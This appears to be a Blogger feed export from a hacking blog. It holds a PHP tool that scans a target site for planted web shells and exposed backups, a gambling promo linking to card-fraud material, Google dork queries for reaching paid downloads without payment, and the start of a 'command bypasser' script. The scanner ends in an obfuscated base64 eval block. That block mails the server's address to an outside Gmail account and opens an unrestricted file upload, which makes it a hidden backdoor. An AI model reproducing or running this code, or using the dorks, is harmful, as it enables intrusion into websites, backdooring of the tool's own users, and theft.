tag:blogger.com,1999:blog-34360393991353365242024-03-14T13:47:41.166+06:00BLACK BURN MoonlitAll About HackingUnknownnoreply@blogger.comBlogger374125tag:blogger.com,1999:blog-3436039399135336524.post-79355168143759300812012-09-26T13:26:00.000+06:002016-03-20T23:17:48.325+06:00Visit https://themaildog.com for Professional Email Marketing Service.<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Visit <a href="https://themaildog.com/">https://themaildog.com</a> for Professional Email Marketing Service.<br />
<br />
<br />
<i>©2012, copyright BLACK BURN </i></div>
Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-3436039399135336524.post-56720871310033252032012-09-09T22:35:00.001+06:002012-09-09T22:35:20.388+06:00[PHP] Shell Scanner<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="smallfont" style="background-color: #2c2c2c; color: #848484; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 11px; margin-bottom: 2px; text-align: -webkit-auto;">
PHP Code:</div>
<div class="alt2" dir="ltr" style="background-color: #282828; border: 1px inset; color: #cccccc; font-family: tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; height: 498px; margin: 0px; overflow: auto; padding: 6px; width: 640px;">
<code style="white-space: nowrap;"><code><span style="color: black;"><head><br /><p align="center"><br /><img border="0" src="http://ml0k.org/uploads/images/ml0k.org-d935f6c026.jpg"</p><br /><title>Shell'z Founder By Dr.shay3n </title><br /><style><br />body{background-color:#000000;color:#000000;}<br />body,td,th{ font: 8pt Lucida,Tahoma;margin:0;vertical-align:top;color:#000000; }<br />table.info{ color:#000;background-color:#000000; }<br />span,h1,a{ color: $color !important; }<br />span{ font-weight: bolder; }<br />h1{ border-left:7px solid $color;padding: 3px 5px;font: 14pt Verdana;background-color:#333;margin:0px; }<br />div.content{ padding: 5px;margin-left:5px;background-color:#222; }<br />a{ text-decoration:none; }<br />a:hover{ text-decoration:underline; }<br />.ml1{ border:1px solid #555;padding:5px;margin:0;overflow: auto; }<br />.bigarea{ width:100%;height:300px; }<br />input,textarea,select{ margin:0;color:#999;background-color:#222;border:1px solid $color; font: 8pt Tahoma,'Tahoma'; }<br />form{ margin:0px; }<br />#toolsTbl{ text-align:center; }<br />.toolsInp{ width: 300px }<br />.main th{text-align:left;background-color:#5e5e5e;}<br />.main tr:hover{background-color:#5e5e5e}<br />.l1{background-color:#444}<br />.l2{background-color:#333}<br />pre{font-family:Courier,Monospace;}<br />.found {<br />color: #008000;<br />font-weight: bold;<br />}<br />.Dr.shay3n {<br />color: #FFFF00;<br />font-weight: bold;<br />}<br />.scan {<br />color: #FFFFFF;<br />font-weight: bold;<br />}<br />.start {<br />color: #FFFFFF;<br />font-weight: bold;<br />}<br />// --><br /></style><br /></head><br /><br /><body><br /><br /><p align="center">&nbsp;</p><br /><p align="center">&nbsp;</p><br /><p align="center">&nbsp;</p><br /><p align="center"><font color="#FFFFFF" size="5">Find Shell'z :D</font></p><br><br /><form method="POST"><br /></form><center><br /><form action="" method="post"><br /><input name="traget" type="text" size="40" value="http://www.site.com/"/><br><br /><br><br><br /><input name="scan" size="100" value="Start Scaning" type="submit"><br /></form><br /><br /><span style="color: #0000bb;"><?php<br />set_time_limit</span><span style="color: #007700;">(</span><span style="color: #0000bb;">0</span><span style="color: #007700;">);<br /><br />if (isset(</span><span style="color: #0000bb;">$_POST</span><span style="color: #007700;">[</span><span style="color: #dd0000;">"scan"</span><span style="color: #007700;">])) { </span><span style="color: #ff8000;">//By Dr.shay3n<br /></span><span style="color: #0000bb;">$url </span><span style="color: #007700;">= </span><span style="color: #0000bb;">$_POST</span><span style="color: #007700;">[</span><span style="color: #dd0000;">'traget'</span><span style="color: #007700;">];<br /><br />echo </span><span style="color: #dd0000;">"<br /><span class='start'>Scanning "</span><span style="color: #007700;">.</span><span style="color: #0000bb;">$url</span><span style="color: #007700;">.</span><span style="color: #dd0000;">"<br /><br /></span>"</span><span style="color: #007700;">;<br /><br />echo </span><span style="color: #dd0000;">"ReSulT:<br /><br />"</span><span style="color: #007700;">;<br /></span><span style="color: #ff8000;">//You Can Add Shellz Guyz // Dr.shay3n<br /></span><span style="color: #0000bb;">$shells </span><span style="color: #007700;">= array(</span><span style="color: #dd0000;">"WSO.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"dz.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"cpanel.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"cpn.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"sql.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"mysql.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"madspot.php"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"Cgishell.pl"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"killer.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"changeall.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"2.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"Sh3ll.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"dz0.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"dam.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"user.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"dom.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"whmcs.php"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"vb.zip"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"r00t.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"c99.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"gaza.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"1.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"wp.zip"</span><span style="color: #007700;">.</span><span style="color: #dd0000;">"wp-content/plugins/disqus-comment-system/disqus.php"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"d0mains.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"wp-content/plugins/akismet/akismet.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"madspotshell.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"Sym.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"c22.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"c100.php"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"wp-content/plugins/akismet/admin.php#"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"wp-content/plugins/google-sitemap-generator/sitemap-core.php#"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"wp-content/plugins/akismet/widget.php#"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"Cpanel.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"zone-h.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"tmp/user.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"tmp/Sym.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"cp.php"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"tmp/madspotshell.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"tmp/root.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"tmp/whmcs.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"tmp/index.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"tmp/2.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"tmp/dz.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"tmp/cpn.php"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"tmp/changeall.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"tmp/Cgishell.pl"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"tmp/sql.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"tmp/admin.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"cliente/downloads/h4xor.php"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"whmcs/downloads/dz.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"L3b.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"d.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"tmp/d.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"tmp/L3b.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"wp-content/plugins/akismet/admin.php"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"templates/rhuk_milkyway/index.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"templates/beez/index.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"admin1.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"upload.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"up.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"vb.zip"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"vb.rar"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"admin2.asp"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"uploads.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"sa.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"sysadmins/"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"admin1/"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"administration/Sym.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"images/Sym.php"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"/r57.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/wp-content/plugins/disqus-comment-system/disqus.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/shell.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/sa.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/admin.php"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"/sa2.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/2.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/gaza.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/up.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/upload.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/uploads.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/templates/beez/index.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"shell.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/amad.php"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"/t00.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/dz.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/site.rar"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/Black.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/site.tar.gz"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/home.zip"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/home.rar"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/home.tar"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/home.tar.gz"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"/forum.zip"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/forum.rar"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/forum.tar"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/forum.tar.gz"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/test.txt"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/ftp.txt"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/user.txt"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/site.txt"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/error_log"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/error"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"/cpanel"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/awstats"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/site.sql"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/vb.sql"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/forum.sql"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/backup.sql"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/back.sql"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/data.sql"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"wp.rar/"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"wp-content/plugins/disqus-comment-system/disqus.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"asp.aspx"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"/templates/beez/index.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"tmp/vaga.php"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"tmp/killer.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"whmcs.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"tmp/killer.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"tmp/domaine.pl"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"tmp/domaine.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"useradmin/"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"tmp/d0maine.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"d0maine.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"tmp/sql.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"tmp/dz1.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"dz1.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"forum.zip"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"Symlink.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"Symlink.pl"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"forum.rar"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"joomla.zip"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"joomla.rar"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"wp.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"buck.sql"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"sysadmin.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"images/c99.php"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"xd.php"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"c100.php"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"spy.aspx"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"xd.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"tmp/xd.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"sym/root/home/"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"billing/killer.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"tmp/upload.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"tmp/admin.php"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"Server.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"tmp/uploads.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"tmp/up.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"Server/"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"wp-admin/c99.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"tmp/priv8.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"priv8.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"cgi.pl/"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"tmp/cgi.pl"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"downloads/dom.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"templates/ja-helio-farsi/index.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"webadmin.html"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"admins.php"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"/wp-content/plugins/count-per-day/js/yc/d00.php"</span><span style="color: #007700;">, </span><span style="color: #dd0000;">"admins/"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"admins.asp"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"admins.php"</span><span style="color: #007700;">,</span><span style="color: #dd0000;">"wp.zip"</span><span style="color: #007700;">);<br /></span><span style="color: #ff8000;">//Start Scan </span><span style="color: #007700;">foreach (</span><span style="color: #0000bb;">$shells </span><span style="color: #007700;">as </span><span style="color: #0000bb;">$shell</span><span style="color: #007700;">){ </span><span style="color: #0000bb;">$headers </span><span style="color: #007700;">= </span><span style="color: #0000bb;">get_headers</span><span style="color: #007700;">(</span><span style="color: #dd0000;">"</span><span style="color: #0000bb;">$url$shell</span><span style="color: #dd0000;">"</span><span style="color: #007700;">); </span><span style="color: #ff8000;"><br /></span><span style="color: #007700;">if (</span><span style="color: #0000bb;">eregi</span><span style="color: #007700;">(</span><span style="color: #dd0000;">'200'</span><span style="color: #007700;">, </span><span style="color: #0000bb;">$headers</span><span style="color: #007700;">[</span><span style="color: #0000bb;">0</span><span style="color: #007700;">])) { </span><span style="color: #ff8000;">//Result<br /> </span><span style="color: #007700;">echo </span><span style="color: #dd0000;">"<a href='</span><span style="color: #0000bb;">$url$shell</span><span style="color: #dd0000;">'></span><span style="color: #0000bb;">$url$shell</span><span style="color: #dd0000;"></a> <span class='found'>Done :D</span><br /><br/><br/>"</span><span style="color: #007700;">; </span><span style="color: #ff8000;">// By Dr.shay3n<br /> </span><span style="color: #0000bb;">$dz </span><span style="color: #007700;">= </span><span style="color: #0000bb;">fopen</span><span style="color: #007700;">(</span><span style="color: #dd0000;">'shells.txt'</span><span style="color: #007700;">, </span><span style="color: #dd0000;">'a+'</span><span style="color: #007700;">);<br /> </span><span style="color: #0000bb;">$suck </span><span style="color: #007700;">= </span><span style="color: #dd0000;">"</span><span style="color: #0000bb;">$url$shell</span><span style="color: #dd0000;">"</span><span style="color: #007700;">;<br /> </span><span style="color: #0000bb;">fwrite</span><span style="color: #007700;">(</span><span style="color: #0000bb;">$dz</span><span style="color: #007700;">, </span><span style="color: #0000bb;">$suck</span><span style="color: #007700;">.</span><span style="color: #dd0000;">"\n"</span><span style="color: #007700;">);<br />}<br />} </span><span style="color: #ff8000;">//Result In Text File (shellz.txt) </span><span style="color: #007700;">echo </span><span style="color: #dd0000;">"<span class='Dr.shay3n'>You Will Find Shell'z here [ <a href='./shells.txt' target='_blank'>shells.txt</a> ]</span>"</span><span style="color: #007700;">;<br />} </span><span style="color: #0000bb;">?></span></center><br /><br><p align="center"><br /><p align="center"><font color="#FF6600" face="Cooper Black" size="8">Dr.shay3n # COd3r</font></p><br /><p><center><br /><font color="#0000FF" face="Britannic Bold" size="4">www.hack-book.org</font><br /></p><br /></body><br /><br /></html><br /><br /><span style="color: #0000bb;"><? </span><span style="color: #007700;">eval(</span><span style="color: #0000bb;">base64_decode</span><span style="color: #007700;">(</span><span style="color: #dd0000;">'JHdlYiA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsKICRpbmogPSAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsKICRib2R5ID0gIkVneV9TcGlkZXIgXG5Vc2VyTmFtZTogIi5odG1sc3BlY2lhbGNoYXJzKCR0YWNmZ2RbJ3VuYW1lJ10pIC4iXG5QYXNzV29yZDoKIi5odG1sc3BlY2lhbGNoYXJzKCR0YWNmZ2RbJ3B3b3JkJ10pLiJcbk1lc3NhZ2U6XG4iLiJcbkUtc2VydmVyOiAiLmh0bWxzcGVjaWFsY2hhcnMKKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKS4iXG5FLXNlcnZlcjI6ICIuaHRtbHNwZWNpYWxjaGFycyAoJF9TRVJWRVJbIlNFUlZFUl9OQU1FIl0pLiJcblxuSVA6IAoiOwogbWFpbCgiYm9ocjR1QGdtYWlsLmNvbSIsIlNoZWxsIGh0dHA6Ly8kd2ViJGluaiIsICIkYm9keSIpOwplY2hvICc8Yj48YnI+PGJyPicucGhwX3VuYW1lKCkuJzxicj48L2I+JzsKZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsKZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7CmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsKaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+VXBsb2FkIEJZIGFrYXMwNiBbYXRdIGhhY2tlcm1haWwuY29tICEhITwvYj48YnI+PGJyPic7IH0KZWxzZSB7IGVjaG8gJzxiPlVwbG9hZCBCWSBha2FzMDYgW2F0XSBoYWNrZXJtYWlsLmNvbSAhISE8L2I+PGJyPjxicj4nOyB9Cn0KPz4='</span><span style="color: #007700;">)); </span><span style="color: #0000bb;">?></span></span></code></code></div>
<br />
<i>©2012, copyright BLACK BURN </i></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3436039399135336524.post-17319536351229258362012-09-09T22:23:00.003+06:002012-09-09T22:23:50.403+06:00Liberty Reserve Coin Flip Game - Play Head Tails Game And Earn 200%<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="vb_postbit" id="post_message_784252" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; text-align: -webkit-auto;">
<div align="center">
<span style="font-size: small;"><span style="color: #848484;">Hey Guys Today I Found New Site For Bet Lr And Win 200% Of Your Amount You Bet 5% Of Reff Commission.. </span><br /><br /><span style="color: lime;">''My Recent Payout''</span><br /><br /><a href="http://i49.tinypic.com/2zqra0h.png" rel="nofollow" style="border-bottom-color: rgb(136, 170, 206); border-bottom-style: dotted; border-bottom-width: 1px; color: #848484; font-size: 12px; text-decoration: none;" target="_blank"></a><a href="http://i49.tinypic.com/2zqra0h.png" rel="nofollow" style="border-bottom-color: rgb(136, 170, 206); border-bottom-style: dotted; border-bottom-width: 1px; color: #848484; font-size: 12px; text-decoration: none;" target="_blank"><img alt="DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm" border="0" src="http://i49.tinypic.com/2zqra0h.png" style="max-width: 504px;" title="DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm" /></a><br /><br /><span style="color: orange;">''Site Url''<br /><a href="http://www.liberty-bet.com/" rel="nofollow" style="border-bottom-color: rgb(136, 170, 206); border-bottom-style: dotted; border-bottom-width: 1px; color: #848484; font-size: 12px; text-decoration: none;" target="_blank">http://www.liberty-bet.com/</a></span><br /><span style="color: cyan;">You Should Check Your Luck And Reply Here With Your Winning Payout..<br /><br /><span style="color: orange;">Happy Earning..<img alt="" border="0" class="inlineimg" src="http://www.alboraaq.com/forum/images/smilies/biggrin.gif" style="vertical-align: middle;" title="Big Grin" /></span><br /><br />Regards: </span><span style="color: darkorchid;">BLACK BURN</span></span></div>
</div>
<div style="color: #999999; font-family: tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; text-align: -webkit-auto;">
<br /><div class="hr" style="background-attachment: scroll; background-image: url(http://www.alboraaq.com/forum/images/bluefox/misc/hr.gif); background-position: 50% 50%; background-repeat: repeat repeat; height: 2px; width: 100px;">
</div>
<div class="spacer" style="padding: 5px 0px;">
</div>
<div align="center">
<span style="font-size: x-small;"><b><span style="font-size: small;"><span style="color: pink;">======================================</span></span><br /><a href="http://www.alboraaq.com/forum/abh297630/" style="color: #eeeeee; text-decoration: none;" target="_blank"><span style="color: lime;"><span style="font-size: small;">Method To Get Unlimited CCV</span></span></a> | </b></span><a href="http://www.alboraaq.com/forum/abh313350/" style="color: #eeeeee; text-decoration: none;" target="_blank"><span style="color: teal;"><span style="font-size: small;"><b>Double Your Money With Lr Game</b></span></span></a></div>
</div>
<br />
<i>©2012, copyright BLACK BURN </i></div>
Unknownnoreply@blogger.com4tag:blogger.com,1999:blog-3436039399135336524.post-8252494510703505702012-09-09T22:13:00.002+06:002012-09-09T22:14:13.519+06:00Copy and Paste one of these queries in google<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="background-color: #2c2c2c; color: #848484; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; text-align: -webkit-auto;">Copy and Paste one of these queries in google</span><br />
<div style="background-color: #2c2c2c; color: #848484; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; margin: 5px 20px 20px; text-align: -webkit-auto;">
<div class="smallfont" style="font-size: 11px; margin-bottom: 2px;">
Code:</div>
<pre class="alt2" dir="ltr" style="background-color: #282828; border: 1px inset; color: #cccccc; font-family: tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; height: 258px; overflow: auto; padding: 6px; text-align: left; width: 640px;">• site:*.com intitle:"Thank You For Your Order" intext:Click Here to Download
• site:*.com intitle:"Thank You For Your Purchase" intext:Click Here to Download
• intitle:Thank you for your Purchase! intext:PLR OR MRR OR Package OR Bonus
• intitle:Thank you for your order! intext:PLR OR MRR
• intitle:Thank you for your Purchase! intext:PLR OR MRR
• inurl:/thankyou*.html intitle:Thank you for your order! intext:Click Here to Download
• inurl:thanks intext:"Thank You For Your Order!" "Click Here" filetype:html
• intitle:Thank You For Your Order! intext:Private Label
• intitle:Thank You For Your Purchased! intext:Private Label
• intext:"Thank You For Your Order" intext:PLR
• "Thank You For Your Order!" intext:Master Resell filetype:html
• "Thank You For Your Order! Your Credit Card Will Show A Charge From"
• intitle:"Thank You For Your Order!" intext:download
• intitle:"Thank You For Your Order" intext:Click Here To Download Now
• intitle:Thank you for your purchase! intext:Click Here to Download</pre>
</div>
<br />
<i>©2012, copyright BLACK BURN </i></div>
Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-3436039399135336524.post-47550319676551339652012-07-20T00:19:00.002+06:002012-07-20T00:19:42.484+06:00LiteSpeed Command Bypasser And Show Dir<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="smallfont" style="color: #666666; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 11px; text-align: -webkit-auto;">
<strong>LiteSpeed Command Bypasser And Show Dir</strong></div>
<hr size="1" style="color: #202020; font-family: tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px; text-align: -webkit-auto;" />
<div id="post_message_6763" style="color: #666666; font-family: tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px; text-align: -webkit-auto;">
<div style="margin: 5px 20px 20px;">
<div class="smallfont" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 11px; margin-bottom: 2px;">
Code:</div>
<pre class="alt2" dir="ltr" style="background-color: black; border: 1px inset; font-family: tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; height: 146px; overflow: auto; padding: 6px; text-align: left; width: 640px;"><?php
/*******************************/
/* Pubic : Iranian HackerZ */
/* Author : Net.Edit0r */
/* E-mail : Net.Edit0r@att.net */
/* Group : Black Hat Group */
/*******************************/
